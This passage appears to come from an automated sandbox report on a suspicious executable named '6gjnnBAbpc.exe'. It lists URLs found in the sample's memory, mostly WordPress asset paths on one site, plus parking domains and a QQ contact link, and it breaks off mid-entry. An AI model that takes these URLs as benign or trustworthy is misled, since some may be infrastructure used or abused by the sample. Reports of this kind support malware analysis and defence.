                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=7.5.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=7.5.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.6.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.6.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1678289175
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1676407198
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-410.css?ver=1676407198
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-501.css?ver=1676407198
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/hooks.min.js?ver=4169d3cf8e8d95a3d6d5
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/i18n.min.js?ver=9e794f35a71bb98672ae
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/imagesloaded.min.js?ver=4.1.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=26698c2509d8a9f37e69
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.556374521.0000000000A10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=26698c2509d8a9f37e69464f
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26698c2509d8a9f37e69464fa
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/underscore.min.js?ver=1.13.4
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-includes/js/wp-util.min.js?ver=26698c2509d8a9f37e69464fad7be5f1
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.670702803.0000000009FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rtc.tc17.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520195564.0000000005C20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://statcounter.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D5B000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.539003729.0000000008D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000002.670702803.0000000009FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://survey-smiles.com&W
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.325497918.000000000A2D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://webeasy.com.hk
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://wpa.qq.com/msgrd?v=3&uin=2938350997&site=qq&menu=yes
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D7C000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.378655055.0000000008D60000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.333008412.0000000008D55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww25.pupi.cz/?subid1=20230322-1543-2036-8bbd-6e6eb1b61958
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.464489393.0000000008D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww38.pupi.cz/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.411982759.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411982759.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411734937.0000000008D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/ata
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.411982759.0000000008D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.11tochi.net/c
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541644017.0000000008D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541644017.0000000008D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/3321935-2125563209-4053062332-1002cL
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541644017.0000000008D3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.2print.com/ows
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.762justice.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.313963475.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.aevga.com/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 